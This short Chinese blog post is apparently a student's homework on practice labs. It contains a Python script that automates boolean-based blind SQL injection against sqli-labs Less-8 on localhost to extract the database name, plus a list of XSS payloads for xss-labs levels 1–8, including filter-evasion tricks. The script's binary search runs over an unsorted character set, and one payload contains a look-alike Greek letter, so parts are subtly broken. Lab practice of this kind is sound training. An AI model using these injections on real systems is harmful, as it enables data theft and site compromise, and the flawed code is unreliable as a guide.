第二次作业 

自动化布尔自注的代码进行优化:
import requests
 
# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"
 
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "
 
 
# 推断数据库名的长度
def get_database_length():
    length = 0
    while True:
        length += 1
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        response = requests.get(url, params={"id": payload})
        if "You are in..........." in response.text:
            return length
        if length > 50:  # 防止无限循环
            break
    return 0
 
 
# 使用二分查找推断数据库名
def get_database_name(length):
    db_name = ""
    for i in range(1, length + 1):
        left, right = 0, len(charset) - 1
        while left <= right:
            mid = (left + right) // 2
            char = charset[mid]
            payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "
            response = requests.get(url, params={"id": payload})
            if "You are in" in response.text:
                left = mid + 1
            else:
                right = mid - 1
        db_name += charset[right]
    return db_name
 
 
# 主函数
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")

 

xss-labs 1到8关:

 第二关onclick事件的触发

 第三关' οnclick='alert(1)

 第四关,重新插入

 第五关'"> <a href="javascript:alert(1)">"'test</a>

 第六关'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

 第七关'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

 第八关进行实体编码

 

 

 

posted @ 2025-07-22 23:31  青鸢..i  阅读(6)  评论(0)    收藏  举报